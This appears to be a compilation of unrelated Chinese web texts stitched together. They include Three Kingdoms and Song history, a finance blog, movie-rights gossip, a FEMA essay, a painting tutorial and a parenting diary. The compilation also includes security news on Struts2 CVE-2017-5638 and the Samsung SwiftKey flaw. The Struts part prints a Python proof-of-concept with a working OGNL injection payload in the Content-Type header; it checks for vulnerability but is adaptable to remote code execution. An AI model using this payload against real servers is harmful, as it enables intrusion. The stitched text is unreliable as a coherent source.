诗@半岛雪
有一种声音将自生命中来,
点亮我手掌中的星星,
那柔软的光于最洁净的心底波动,
将焦渴的期翼写进赞美诗,生命的泉音,
神性的,神圣的,神感的……
那最原始的一种旋律,
令无数行走的人感动落泪,
心满意足摘取最遥远的花朵。
一旦遭受这种声音的袭击,
整个人间的银雪敲击如泉眼眸,
整个世界的生命片段重新组合,
整个宇宙的力量将汇聚于神奇,
相信吧,就是这种声音,让
我再次耕耘上半辈子的故事,
将贫瘠的时间肥沃,将残缺再次拼贴,
就是这种声音,它将继续继承宗族的基因,
和生生不息的火焰,永不知疲倦的歌咏,
就是这种声音,
—啼哭。
人生总是充满着意外,而命运就在其中若隐若现。
公元175年,两位婴孩同时呱呱坠地。这两个人,一个名叫孙策,另一个名叫周瑜。在日后的乱世中,他们都将绽放一片属于自己的光彩。
这一年,刘备正满十五岁。
古人十五岁是成童之时。到了这个年纪,有钱有势的人家便要送孩子去读大学。
何谓大学?在汉代,儿童的教育体系已经大体成型。通常来说,八岁以后,儿童便要接受启蒙教育,先是识字,之后是学习一些较为浅显的儒家经典。这是小学。
到了十五岁成童后,便要进一步深造,学习深奥的《周易》、《诗经》、《春秋经》、《尚书》、《礼》等五经经义。这是大学。
这一年,刘备遇到了人生中第一位贵人——卢植。
卢植是汉代有名的大儒,师从东汉的经学泰斗马融,与郑玄、华歆等是都同门师兄弟。曹操曾经这样评价他:
“故北中郎将卢植,名著海内,学为儒宗,士之楷模,国之桢干也。”
由此可见时人对他的推崇。
与一般的腐儒不同,卢植有济世救人的志向,同时还颇通兵法。
公元175年,扬州九江郡发生蛮族叛乱,朝廷认为卢植才兼文武,于是拜他为九江太守。卢植到任后,果然迅速平定了当地叛乱,蛮夷均服。但不久,卢植便因为身体有恙,辞官养病。
卢植也是涿郡人。辞官养病的同时,卢植一面著书立说,一面又开馆授学。刘备便是在此时拜入了卢植的门下。
刘备是幸运的。因为他刚到要入大学的年纪,便碰到了这样一位名满天下的大儒,成了他的入室弟子。要知道,仅仅一年多以后,卢植就结束了隐居生涯而再次踏入官场。
如果错过这次机会,刘备恐怕再也无缘拜入这样的海内大儒的门下。而正是凭借这个身份,刘备才有了融入东汉名士圈的敲门砖,以及后来被孔融、陈登等人所接受,并在他们的支持下担任徐州牧一事。
不过,刘备本来没有条件拜师的。
卢植是海内有名的大儒,拜入他的名下学习,自然相当不易。除了有一定的文学基础,也需要交纳不菲的束脩——也就是学费。除了学费,当时的学生往往寄宿在老师家中,吃穿用度和书籍都要花钱。
刘母卖席为生,所得收入不过糊口而已,即便再节俭,哪里能凑出这样一大笔开支呢?
“费用我来出吧!”说这话的人叫刘元起,与刘备同属一族。他家境富裕,有足够的能力供应刘备外出求学的费用。刘母自然感激不尽。
“咱们彼此各为一家,如何能经常予人钱财呢?”妻子曾这样质疑道。
“我们家族出了这样一个人,不同寻常啊。”刘元起一边回应妻子,一边在脑海中回忆着这些年对刘备的观察所得。
刘元起最初对刘备产生印象,源于几年前一个儿童间的玩笑。
刘备家房屋东南边有一颗年代久远的桑树,五丈多高,从远处望去,其枝叶如同贵人所做马车的车盖一般。一天,当时不过总角之年的刘备,正与一群小伙伴在树下愉快地玩耍着。
嬉戏期间,刘备抬头望着那高高的桑树,忽然指着它大声说了一句:“等我长大了,一定要乘坐这样高大的羽葆盖车!”声音虽然稚嫩,却透露出一股豪迈之气。
话音刚落,却见一个男子从屋里匆匆跑出来,一把便将刘备拉进家门,并低声叱责道:“以后不准再胡言乱语,不然我们一家都要被抓住杀头!”
说话的男子叫刘子敬,是刘备的同宗叔父。他的话并不是危言耸听。羽葆盖车是皇上专用之物,要乘这样的车驾无异于表示自己想当皇帝,这当然属于大逆不道之罪,按照法律要诛三族,无怪乎他这样害怕。
同样的话也被刚好路过的刘元起听到。与刘子敬不同,他却从中听出了一种渴望和志向。
“少有大志,此子不凡。”这是他的第一反应。自此以后,刘元起便开始默默地观察起了这个孩子。
随着年岁的增长,刘备越来越表现出他与同龄人的与众不同。
他不像一般少年那样爱逞口舌之快,有时甚至显得太过沉默寡言。碰到一些身份低贱的人,不像一般人那样颐指气使,反而常常谦逊地对待。
他遇到事情从来极少慌张,有着近似成年人的沉着与冷静。有人羞辱他时,并不随便发火,遇到高兴的事,也不会得意忘形。
“此子必成大器!”伴随着对刘备的深入了解,刘元起越发坚定了自己最初的判断。因此,当听说刘备无钱读书时,他毫不犹豫地慷慨解囊。
“这是政治投资。”刘元起最后对妻子说了这么一句总结性的话语。
有了同族人的资助,刘备得以顺利地拜师卢植。
“母亲,我一定努力跟随先生学习,不辜负您的希望!”分别时,望着母亲因常年劳作而有些佝偻的身躯,刘备暗暗发誓。
随后,他迈着坚定的步伐头也不回地离开了那居住十五年的村庄,迎面走进一个广阔天地。
最近一段,自己一半以上的时间精力集中与金融相关的事情上。
1、创业项目的资本对接。对自己创业了10多年的通信基础设施特许经营项目反复调整商业模式,与上市公司、投资人、基金公司沟通,主要希望尽快完成与资本的对接,最终彻底解决项目后续长期的资金问题,也能实现各方的优雅退出;
2、尝试进入金融服务领域。一步一步实现年初制订的年度目标之一:组建一个金融服务小团队。现在平台公司已经有了,主要物色合伙人,策划金融服务业务,为未来成为一个私募基金公司做好长期发展规划。
3、学习金融投资有关知识。向书本上学,和高手学,向实践学。在学习中建立全方位的金融概念,了解投资理财的基本规则,并在实践中慢慢体会和找到规律。这个事情已经坚持3-4个月了,接触了很多金融服务机构,尝试了股票、基金等各类投资品的盈亏进退方式。
这是今年5月份开始学习投资理财后,我确定的人生调整方向:人生上半场,我是一个创业者(已经无法改变);人生下半场,我要成为一个投资人(未来努力方向)。现在正在做的这一切,就是从一次创业者向一个投资人的跃迁。
大多数创业者都有一个梦想,就是把自己创业的项目做到挂牌上市,然后功成名就、退隐南山。事实上,只有少数的企业能够完成这样的目标,这条路很窄、很艰难。70%的企业最后终止经营的原因,是现金流断裂。
所以,创业者先不要考虑是否能上市的事情。最先应该思考的,应该是如何吸引投资人的事情,让自己创业项目很多人都想参与投资,就是创业成功的第一步。
自己创业的项目在过去10几年中,也吸引了不少个人投资者参与,包括股权投资、项目合作投资、联营合作投资。但由于都是个人投资,对于资本运作、退出方式并没有太高的要求,后续持续投资能力也非常有限,所以很难把创业项目推动到更高的高度,仍然停留在较低的融资合作层面。
学习投资理财之后,我的几个重要体会:
一是投资者的思维模式完全不一样。所有专业投资者,每一次投资决策先思考风险和投资安全,再考虑投资回报率。同时,对于投资回收期长短、退出方式的难易、机会成本的高低都有明确的诉求。
二是投资者要求的投资回报率完全不同。抛开打板敢死队的特殊群体,一般的股权投资者(机构)能看上的项目,都是能够实现3年10倍甚至数十倍以上的回报。就是普通的理财投资的投资品,没有超过15%的年化收益率,也很难打动人。所以,投资项目行为,说到底就是一个如何选择的事情,资产如何配置组合的事情。
三是个人机会完全不一样。从全球范围看,中国应该仍然是商业机会最多的国家,但从产业角度看,投资领域仍然是实现个人财务自由最近的一条路。金融投资领域从业人员的收入水平高出其他领域平均至少50%,就可以看出某一种概率。
记得和某个金融机构高管聊天,虽然他已经金融领域从业10多年,但他仍然坚持认为,在投资领域他仍然是一个新人和学习者,成为一个专业而成功的投资者难度非常非常大。
1024rd上次曝Struts 2的漏洞已经是半年多以前的事情了。这次的漏洞又是个RCE远程代码执行漏洞。简单来说,基于Jakarta Multipart解析器进行文件上传时,利用漏洞可进行远程代码执行。 该漏洞由安恒信息Nike Zheng上报。
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。
CVE-2017-5638
Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行。
实际上在default.properties文件中,struts.multipart.parser的值有两个选择,分别是jakarta和pell(另外原本其实也有第三种选择cos)。其中的jakarta解析器是Struts 2框架的标准组成部分。默认情况下jakarta是启用的,所以该漏洞的严重性需要得到正视。
Struts 2.3.5 – Struts 2.3.31
Struts 2.5 – Struts 2.5.10
如果你正在使用基于Jakarta的文件上传Multipart解析器,请升级到Apache Struts 2.3.32或2.5.10.1版;或者也可以切换到不同的实现文件上传Multipart解析器。
漏洞盒子流行漏洞检测 与 网藤风险感知 已支持对该漏洞的检测,申请免费使用
import requests
import sys
def poc(url):
payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
headers = {}
headers["Content-Type"] = payload
r = requests.get(url, headers=headers)
if "105059592" in r.content:
return True
return False
if __name__ == '__main__':
if len(sys.argv) == 1:
print "python s2-045.py target"
sys.exit()
if poc(sys.argv[1]):
print "vulnerable"
else:
print "not vulnerable"
* 参考来源:Apache,转载请注明来自1024rd.COM
蜘蛛侠的电影角色其实和美国队长、绿巨人他们不同属一个公司?
16年美漫角色排行,漫威红人钢铁侠只排第6,蜘蛛侠人气第2?
蜘蛛侠重回漫威制作,本次票房却与漫威无关?
漫威索尼同意联手打造蜘蛛侠系列,催化剂是因为黑客?
上面这4个疑问是按照对美漫、漫威的了解程度,从浅到深依次排序的。
如果都知道,那应该是资深的美漫fans,如果都是问号脸,那就接着听故事。
很久很久以前,当时漫威还是个纯漫画公司,完全没有拍电影的计划,生意经营困难,就有了卖角色版权维持公司经营的念头。
最先卖的是x战警系列,给到福克斯公司。
福克斯拍了x战警的电影后,票房爆棚。
索尼一看,这玩意有意思啊,就找漫威谈,买走了人气超旺的蜘蛛侠,大约是1999年,700万美元。
漫威影业成立后,逐渐有了漫威电影宇宙的计划。
08年钢铁侠的上映一炮而红,这时又怀念起来了人气嘴炮侠-蜘蛛侠的版权的事情。
漫威有情。
索尼影业那边,蜘蛛侠系列逐渐成为它的金字招牌,累计票房已经超过40亿美元。
但趋势似乎不是很好看,两部重启的《超凡蜘蛛侠》口碑平平,致使票房糟心。
最近的《超凡蜘蛛侠2》,预期10亿美元,结果全球票房只卖了7亿,索尼多少会有点不舒爽。
另外,2011年蜘蛛侠除了电影以外的周边衍生品版权,重回到了漫威手里,致使索尼蜘蛛侠电影收入又少了一块。
话说,当初索尼收走了蜘蛛侠电影版权之后,和漫威有过约定:必须每5年拍摄一部电影,如果达不到,就得把版权还给漫威。
这就有点尴尬了,拍的话可能达不到预期,不拍的话可能会被收走版权,左右为难,得想办法扭转。
索尼有意。
索尼、漫威内心都有合作的意愿,一直在磋商此事。
直到2014年末,索尼影业遭到黑客攻击,高层之间对蜘蛛侠合作意向的邮件,意外曝光,美漫迷瞬间炸裂,热情回应。
俩公司一合计,这里有搞头啊,媒体的报道和公众的热情让双方看到了这件事情蕴藏的商机,就此,双方均作出了一些妥协,迅速达成合作。
之后,就先有了,蜘蛛侠出现在美队3。
合作细节有很多,其中关于钱方面,漫威、索尼却默契的像两个好基友。
蜘蛛侠拍漫威的电影,漫威不需要给钱,《美国队长3》、《妇联3》蜘蛛侠都是赠的。
同时,漫威帮索尼拍的蜘蛛侠电影,票房收入也全部归索尼,漫威分文不取。
虽然如此,但每个剧作的上映都会推动角色商业价值的提升,进而带动各自电影计划的热度,实则双赢。
所以,《蜘蛛侠,英雄归来》背后有着额外的深意,再看遍预告片吧,听说片尾会有2个彩蛋。
关于两个公司合作细节以及数据,均来源于网络
第三个人,康延泽。
曹彬和吕余庆都算高级官僚,康延泽在职级上要比他们差很多,在史书中,他连籍贯、年龄都没留下来,是个不折不扣的小人物。而正是这个小人物,最终却成了平定蜀乱的最大功臣。
康延泽原本的职务是成都都监。都监,本是负责训练、后勤等综合事务的官职。叛乱发生后,赵匡胤直接下令给予康延泽一个新的职务——普州(今四川安岳县)刺史。
当时的普州是叛乱最为严重的地区,那里除了大量蜀地叛军以外,还掺杂了不少宋军叛乱者,总人数达到五万人。到那里去当官,无异于探险。
康延泽没有丝毫推脱,只是在出发前,向王全斌提了个要求——派兵护送他去上任。
照理说,兵荒马乱的岁月,又是到敌占区去工作,怎么也得给几千人马。
不知是和康延泽有仇,还是确实无人可用,王全斌竟然只拨给他一百个人。就这么几个人,抓个蟊贼都够呛,还平叛、安抚?简直就是明摆着去送死。正当大家认为他必死无疑的时候,康延泽却依然很镇定。
啥也没说,领着这一百来号人,头也不回地向普州进发了。
一路过去,康延泽并没有研究什么战场形势、战斗方法,而是干起了招聘工作。
当时蜀地到处是散兵、强盗、盲流,对于这些闲散人员来说,在乱世中只要有口饭吃就可以,跟谁混都一样。
康延泽发挥了此前的工作特长(当过都监),充分挖掘这块人力资源,连哄带骗地招募一大批闲散人员。光招募还不够,还直接组编成军队进行阵法演练。
一路边走边招、边招边练,等到了普州地界,居然已经凑到了一千人。
康延泽的神奇不止于此。就凭着这一千人,他多次和数倍于自己的敌军作战,屡获胜利。每次打完胜仗也不闲着,继续干起他招聘的老本行,搜罗被击溃的散兵游勇,补充壮大自己。
打完就开始招聘,招聘完了再继续找人打。靠这种滚雪球式的搞法,康延泽不但最终夺回了普州城,还顺便把占据普州的整支叛军都“招聘”了过来,一下凑齐了一支几万人的队伍。
如此奇才,当个普州刺史实在太委屈了。不久,康延泽升任东川七州招安巡检使,在平定乱军中起到了更大的作用。
康延泽固然有他的神奇之处,但最主要的还是应对策略得当,他更多的是采取安抚的方法,而不是简单打压。
事实确实如此,对于蜀地的普通士兵和百姓而言,他们需要的仅仅是能吃饱饭,有份养家糊口的收入而已,至于皇帝姓孟还是姓赵,他们并不关心。
所谓“叛乱”,只不过是欺凌达到了极限后,被逼发出的怒吼而已。
经过初期的慌乱后,宋军开始主动纠正错误,一面维护军纪,一面想尽办法安抚、招降蜀军。
蜀军毕竟没有明确的政治目标,本身战斗力就弱于宋军,各地军队又缺乏统一协调的指挥,逐渐开始处于下风。
乾德四年(966)十二月,全师雄在宋军连续打击下败走,最终转战至成都北面的金堂(今四川金堂县)病死。
康延泽继续着他的神勇发挥,一路追击残余蜀军,生擒叛军最后一位首领(全师雄死后叛军推举),为自己的神奇划上了一个圆满句号。
至此,宋军终于彻底平息乱兵。
六十六天攻下后蜀,却用近两年的时间才彻底征服。
事情办得实在窝囊,差点把赵匡胤的鼻子气歪。大军回来后,他立刻清算了王全斌、王仁赡等人的烂账,贬了他们的官职。
这场风波给赵匡胤带来了极大触动。他意识到,五代遗留下来的骄兵悍将之风,绝对不是搞几次批评教育能解决,如果不从根本上予以纠正,那些将士就是无法驾驭的惊涛骇浪,既可以将他捧上浪尖,也可以让他堙没海底。
赵匡胤立志改变旧有的统治秩序,为帝国建立一套新的运行规则。
一年一度的八月下旬,是加勒比海地区和墨西哥湾热带海洋生成飓风的高发季。因为地形平坦,美国南方诸州,从佛罗里达到德克萨斯,对飓风来袭无一幸免, 狂风暴雨大水灾会砸到哪里, 破坏性有多大,全凭运气。今年运气很差,“哈维”之后紧跟着“艾尔玛”, 登陆前都是五级极品的巨无霸灾害,还成双入对地来。
当地时间2017年9月10日,美国劳德戴尔,被飓风“撕裂”的美国国旗休斯顿被飓风“哈维”袭击以后,整个城市陷入瘫痪。美国联邦政府的救灾部门FEMA再次不见踪影。联邦的救灾力量从来都比现实落后好几步,2004年卡特里娜飓风后,新奥尔良被淹,FEMA迟迟不来,到来之后它的救灾设备和训练又是牛头不对马嘴。比如,FEMA的通讯设备可以轻易联系通讯卫星,却不能用来协调大水中赶来的各路消防队和救灾义工,联络救援队伍的利器是“低科技”的报话机。
FEMA, 全称“联邦紧急事件处理局”, 是一个跨多个部门的综合军事防御机构,“抗洪救灾”并不在它的职责之类。它自从冷战成立开始,原本是为对付核打击后的战后美国瘫痪状态, 它的任务包括核打击以后对国家领导人的保护,全国各地在电力和电讯瘫痪情况下的通讯联系(比如电子邮件“伊妹儿”,最早是FEMA的工程师发明的,这是网络发明史上美国军事部门的贡献之一),包括地下防御工事和隧道的建筑和保养, 城镇居民的疏散和避难场地。
FEMA的职能在过去几十年中几经变化,冷战结束后,它应付“核打击”的职能被淡化,但是不改的是它神秘的军方背景和军事技术。2001年“911”恐袭后,FEMA的反恐职能独立出去,成立“国土安全局”。FEMA的军事性质,不要说中文读者,就是美国国内的大部分民众都不清楚,普通人都误以为它是美国的“抗洪救灾指挥部”。是以《连线》杂志近日刊登长文追述FEMA的历史,澄清美国读者的疑惑, 解释为什么FEMA这样一个高科技巨兽,在水灾面前却束手无策,让它去救被大水困在房顶上的平民百姓,等于用原子弹打野鸭子那样不得要领,既做不好,也不及时, 2005年新奥尔良飓风后引发堤坝决堤,水灾后引咎辞职第一个就是FEMA的局长。
那么美国的抗洪救灾到底靠谁呢? 除了当地的市政府、警察、红十字会、911呼救系统、“国家飓风办”,这些官方的救灾组织都指望不上的时候――基本都指望不上,想想小布什总统在获悉新奥尔良大坝决堤后脱口而出的话吧:“只要不是恐怖分子炸的就行。”美国老百姓的心瓦凉瓦凉的, 2005年的新奥尔良水灾是美国国内当代历史的丑陋丰碑,没有之一。美国南方州底层的穷,孤立无助,老百姓互助的热心,在水灾后的十几次国会听证会上暴露无疑。 唯一靠谱的, 真正冲进水深火热中的救灾有生力量,是民间组织。 杰出代表就是“卡津海军”(Cajun Navy)这种民间船队, 当时自愿救灾的民间小船四百多艘,在新奥尔良地区救出的人超过万人。
近日休斯顿遭遇哈维飓风,“卡津海军”已经有七千多人的队伍,他们在第一时间进入休斯顿救人时,同时组织招募了德克萨斯州本地的居民队伍,叫“德州海军”。“卡津海军”除了人数增加,还增加了新媒体帮手,一个叫Zello的手机应用APP,它的功能类似于报话机,跟其他的语音通信APP比,它对流量需求低, 在网络信号覆盖不好的地区甚至2G信号区,都可以使用。休斯顿飓风后,Zello 的美国用户增加了六倍, 使用量是平时的二十倍。
“卡津海军”卡津海军诞生之州,路易斯安那,这种草根互助救援的传统可以上溯好多代人。多水域的地理使很多居民有船,联邦救灾的不得力也使当地人不得不自助,而气候变暖使多雨多水灾频繁,成为南方的气候新常态, 最近一次“百年不遇”的大水灾发生在2016年。2016年的水灾被媒体报道得并不多,因为当时全美的注意力都在总统竞选上。在哈维飓风后,《纽约客》采访那里一家被水灾冲塌房屋的居民,像大多数底层普通人,他们并没有洪水保险,房屋被水淹了之后根本无钱修理, 联邦“抗洪部”灾后安置他们的办法,也是唯一的贡献,是给他们送来一个白色的活动房屋,放在他们的门前院子里,他们至今都住在这“白房”里。哪天政府要收回活动房屋了,他们无家可归怎么办?不知道。而把他们从水里救出来的,正是当地的“卡津船队”。
天灾面前凸显的是社会阶层的差异,最没有抵御能力的永远是穷人和老人, 这个规律在全世界都通用,美国也不例外:比如2005年新奥尔良大水灾,无法撤离的人群有两类,一是没有车无法撤离的穷人,二是没有行动能力的老人。接受新奥尔良大水的教训后,2006年,一个旨在指挥全民撤离计划的民间自愿者组织诞生,Evacuteer, 这个组织受到美国政府部门的认可,从新奥尔良入手,改善大规模人群撤离。
所谓改善,就是在需要撤离的时候,社会各阶层的人口“一个都不拉下”:无家可归者,病榻上的行动不便的老人,家里有多只宠物的人……对于没有车的人,他们调动校车,城市巴士;灾难避难所建立宠物区,让汪和喵安心入住。对这个组织的效率真正的考验是前几天迈阿密的百万人大撤离。
哈维飓风中,居民搭乘校车撤离大规模人群撤离,现在是城市规划学的重要课题之一。
艾尔玛登陆的路径跟踪,最新更新是它在坦帕湾而非迈阿密登陆。这么一来,千辛万苦早早从家里撤离出来的迈阿密市民很生气, 白跑路了,对采访的记者说:“气象预报是干什么吃!” 好像很失望。但事先没有得到撤离警告的坦帕湾的居民却苦了,在等待中心惊胆战。与自然对赌,人怎么都是输。
三星Galaxy手机近日曝高危漏洞,黑客可暗中监控用户的摄像头和麦克风,读取输入和传出的短信以及安装恶意应用程序,影响全球超过6亿三星手机用户。技术分析报告点我
漏洞描述
该漏洞存在于三星定制版SwiftKey输入法的更新机制中,运用于三星Galaxy S6,S5,以及其他几个Galaxy系列手机中。当下载更新软件时,三星设备并不会对该可执行文件进行加密处理,这就使得攻击者有机会修改其上行流量(如位于同一个Wi-Fi网络的),用恶意攻击载荷来替代合法的文件。该漏洞是在周二的伦敦黑帽安全大会上被一名来自nowsecure安全公司的研究员-Ryan威尔顿所证实的。
手机预装的三星输入法,为三星定制版SwiftKey,其会定期查询授权服务器对于键盘APP以及其他附加的语言包是否有效可用。攻击者在中间人的位置可以冒充服务器并发送一个包含恶意有效载荷的响应,使其注入到一个语言包更新程序中。因为三星手机为更新程序提供了特殊的提升权限,因此恶意有效载荷就能够有效避开保护系统,进入谷歌的Android操作系统,。
令人惊讶的是,在键盘更新过程中ZIP存档文件的发送并不是通过传输层安全加密进行保护的,因此极易受到中间人的篡改。系统设计者要求将这个文件的内容与之前发送到手机上的清单文件进行匹配,但这个要求对于安全并没有起到有效的意义。根据这个解决措施,Welton给易受攻击的手机发送了冒充的清单文件,其中包含恶意有效载荷的SHA1 hash。他还提供了很多有关潜在漏洞方面的细节等等。
Welton称无论手机配置什么样的键盘,漏洞都是存在的——即使不用三星的输入法键盘,攻击仍然可能发生。在攻击实践方面,利用这个漏洞对于攻击者来说需要耐心,因为他们必须等待更新机制启动时,或是手机开启,以及间隔时段才可以进行攻击。
影响范围
Welton说他已经确认该漏洞主要活跃在三星Galaxy S6的Verizon和Sprint网络,Galaxy S5的T-Mobile,以及Galaxy S4 Mini的AT&T。据报道Welton已经向三星,谷歌,以及美国CERT提出此漏洞,该漏洞被命名为“CVE-2015-2865”。这个漏洞的源头在SwiftKey提供的软件开发工具包中,但它也涉及到三星在其Galaxy系列手机中实现它的方式。
官方声明
在一份电子声明中,SwiftKey官方写道:
“我们已经看到关于使用SwiftKey SDK的三星库存键盘的安全问题报告。我们可以保证,SwiftKey键盘APP在谷歌Play store或苹果APP store都可以使用,并不受此漏洞的影响。我们非常重视这方面的报道,目前正在进一步调查。”
研究人员称,三星已向移动网络运营商提供了一个补丁,但他无法了解这些主要的运营商是否应用了此补丁。正如ARS在之前已经报道过,运营商一直未能及时提供安全更新。
*作者:晶颜123,翻译整理自ars technica,转载须注明来自1024rd黑客与极客(1024rd.COM)
扶桑花学名朱瑾,是中国南宁市的市花,花瓣倒卵形,先端圆,外面疏被柔毛,有玫瑰红色或淡红、淡黄等色。
完成效果如下:
接下来分享我的绘画步骤给大家。
1、画好线稿
画线稿的时候要注意合理布局画面,整幅画面以中下部的两朵扶桑花为主。画完线稿后要看看画面是否太过拥挤,或偏离了画面中心。
如果完成线稿后发现不太理想,或者与原图不像,建议多次修改原稿,再上色。线稿没有画好的话,后面的步骤也很难补救的哦。
2、大面积的铺色。
先在线稿上刷一层水,铺满整幅画面。
淡红色铺在花朵上,绿色铺在叶片范围,深蓝色点缀在叶片交界处。多余出的颜色也不用在意,大胆下笔就是了。
3、等上一层的颜料干了之后,加深主体物颜色。
上色的时候一定要沿着线稿的范围加深,不要多出物体本身的范围哦。
为了区分叶片的遮挡关系,可以给后面的叶片加上深蓝色。用深一些的红色画出花瓣的纹理,褶皱,加深花朵中心的颜色。
4、刻画细节
用深绿加一点黑色,勾勒出叶脉。画出花蕊,用固体黄和红点缀花心。
5、给花朵一个背景
用清水在花朵外围刷一层水,淡绿色加大量的水,刷出第一遍背景色。
下半部分,在绿色背景的基础上,再晕染深蓝色,让两种底色自然的融合,在花瓣阴影的部位加一些蓝色的阴影。
画面完成,欢迎小伙伴们多多交流。
我们今天的晚饭在点菜上算是一个失败的尝试。爸爸点的鸡肉被烤得又老又干;女儿对所点的意面也不太满意(芝士太重了),但是对于配送的面饼却情有独钟。我点的烤鱼虽然称不上“哇噢”,加上配菜沙拉和米饭还算得上OK。最后老板出面给爸爸的那一份免单了。虽然突然多出来了这么一个意外小插曲,却仍然没有影响我们晚饭后在38度的“清凉温度”下散步的兴致。当我们赤脚走在松软的白沙滩上时,一切烦恼和不愉快似乎都被抛到了九霄云外。
爸爸在海边做他的健身练习;女儿和我在不远处挖沙捡贝壳,忙得不亦乐乎。不知不觉夜已深,于是我们便往回走。在回酒店的路上,经过一个小型的游乐场,我们一眼就看到了投篮赢玩偶的铺子,因为它的广告特别的醒目。如果是在平时,爸爸一般是不会驻足停留的,不知道今天他为什么会选择玩一下。女儿投了几次都没投中,最后她让爸爸投了两次,也是差一点没中。结果是女儿还想继续投篮,但是爸爸不同意,说玩得差不多了,该回去睡觉了。于是女儿就突然不开心了,说还没有得到玩偶,所以她要一直投篮到投中为止。
爸爸开始了说教:“投篮是因为好玩儿,又不是为了一定中奖。”女儿反驳他说:“不为了中奖,那么投篮有什么意思啊!”爸爸笑着说:“刚才买票的钱足够你吃四个冰淇淋了。”女儿不假思索丢下一句狠话:“我不吃冰淇淋了,我要继续投篮。”爸爸又说了一些女儿在那个当下根本就不可能听得进去的话。看她没什么反应,最后爸爸气得只说了一句:“你要发脾气的话就走吧!”
女儿狠狠地瞪了爸爸一眼,然后就大步向前走去。我们已经了解她会时不时地回过头来看看我们是不是跟在后面。如果我们在她身后,她就会放心大胆地继续发飙;如果我们选择故意躲起来,她会立马回来找我们。等她再次看到了我们之后,便又会继续重复刚才的耍赖小把戏。
以前的我也会经常使用第二种方法,就是让她自顾自儿地发脾气而不予理睬。后来经过一些学习我发现,故意冷落孩子也相当于是一种“暴力沟通”,是非常不对的,很容易造成孩子心理上的不安全感。于是不管女儿因为什么事情发脾气,我都会在她能看得见的范围之内,但是仍然会跟她保持一定的距离。这就是在告诉她:我不会因为她做错了什么而不爱她或是不要她,但是她目前的这个行为我不认同、也不接受。
女儿独自一个人走了一段路之后,在路边的一张椅子上坐下来,然后用眼睛的余光看着我们慢慢地靠近她。当我们走到她旁边,她又准备赌气一个人走的时候,我用温柔而坚定的语气喊住她:“难道你不想通过好好沟通来解决问题吗?”女儿停住脚步气呼呼地说:“我就要继续投篮,一直投中为止。”
我:我也很想你和爸爸能投中啊!但你知道为什么你俩都没投中吗?你们平时玩篮球的时候可是都投得挺准的呀(先表示同理心,然后引导她自己发现问题的所在。)
她:他们给我的篮球很大,又很重,而且篮筐才那么小。他们为什么不给我小一点的篮球呢?那样的话我肯定就已经投中了(给她机会来发泄心中的不满)。
我:我刚才也问那个阿姨同样的问题了?
她:她是怎么回答你的?
我:我也看到他们有小号篮球了。你想一想他们为什么不给你小的篮球、而是给你这么大的一个呢(当她找到问题的症结时,心里才会释然)?
她:他们肯定是不希望我投中呗。
我:如果这么容易就能投中拿奖的话,那他们早就亏本离开了,怎么敢继续在这里呢?
她:哦,对噢!可是我还想再投一次,就最后一次。
我:像这样的游戏,偶然玩一下可以,如果上瘾了就正好中了他们的圈套了。
她:那个奖品玩偶好好玩,我很想得到它。
我:为了“得到”的目的去投篮,你就不能发挥到最好的水平了。
她:为什么呀?
我:当一个人心里有贪婪的感觉时,他做事的性质就发生了根本性的变化。有时候你越是想得到,却越是得不到,因为那种不好的感觉已经让你变得紧张。不是自然而然地发生,就不是最好的状态、境界和结果。
她:那等我们回去之后,你给我买一个一模一样的玩偶,可以吗?
我:这是两码事,请不要混为一谈。OK?
她:我现在饿了,刚才晚饭没吃饱。
我:回去破例给你两块饼干吃。
她:我不要吃饼干,我要吃冰淇淋。
我:你这个不叫“饿”,而是叫“嘴馋”。而且现在已经很晚了,要吃明天再说。
她:可是他们那些人都在吃啊!
我:请不要拿别人有什么,所以你也要的理由来敷衍我。你现在可以好好想一想、数一数我们有些什么,而是别人没有的(这一招蛮管用的)。
女儿每次无话可说的时候就开始自言自语地嘀嘀咕咕,我笑之为“唐僧念紧箍咒”。今天我突然想到了一个应对的方法:我拿出手机,打开录音功能,并对她说,“我把你现在开始说的这些话全部都录下来,作为以后
你有事相求的证据。”没想到这样一个搞笑举动,很快就化解了女儿刚才的坏脾气。
有个大前提是:女儿跟我一起听过好几遍的
《如何说孩子才会听;怎么听孩子才肯说》喜马拉雅音频,她蛮认同里面的实例示范。而且我也会经常强调,我在学习运用他们教的实用方法,理论结合实际。
等到气消了之后,女儿突然一本正经地对我说:“还是妈妈的方法有效,能够很快地帮助我解决发脾气的问题。”我问她:“爸爸的方法怎么了?”她笑答:“爸爸叫我生气的时候‘走’,于是我就走了,但是我越走就感觉越生气。”我反问她:“为什么他叫走你就走啊?你完全可以不走呀,走了又解决不了问题,记住只有好好沟通才能从根本上解决问题!”最后,她还补充一句:“下次我如果再生气,你就对我做鬼脸,把我引笑了就好了哦!”
女儿比我小时候可强多了,虽然偶尔有点小脾气,但是来得快也去得快,而且她现在生气持续的时间也越来越短了。感恩有缘遇见这本书,让我成为更好的自己!也感谢记录的习惯,让我在不断的反省中思考、总结、突破,以至于实现自我超越!
我是行之舞者,那一个放弃了过日子,而是在边行边舞中过生活的Awareness_dancer.
如果我写的某句话,展现的某个场景,让你的内心出现那种温暖而又熟悉的痒痒感觉,哪怕只是瞬间一现,那至少说明在曾经的某个时刻,我们有过一样的内在联接。
喜欢,那就在右下角点亮红心,你的鼓励是我最大的动力来源,也许我们的缘份就此开始了。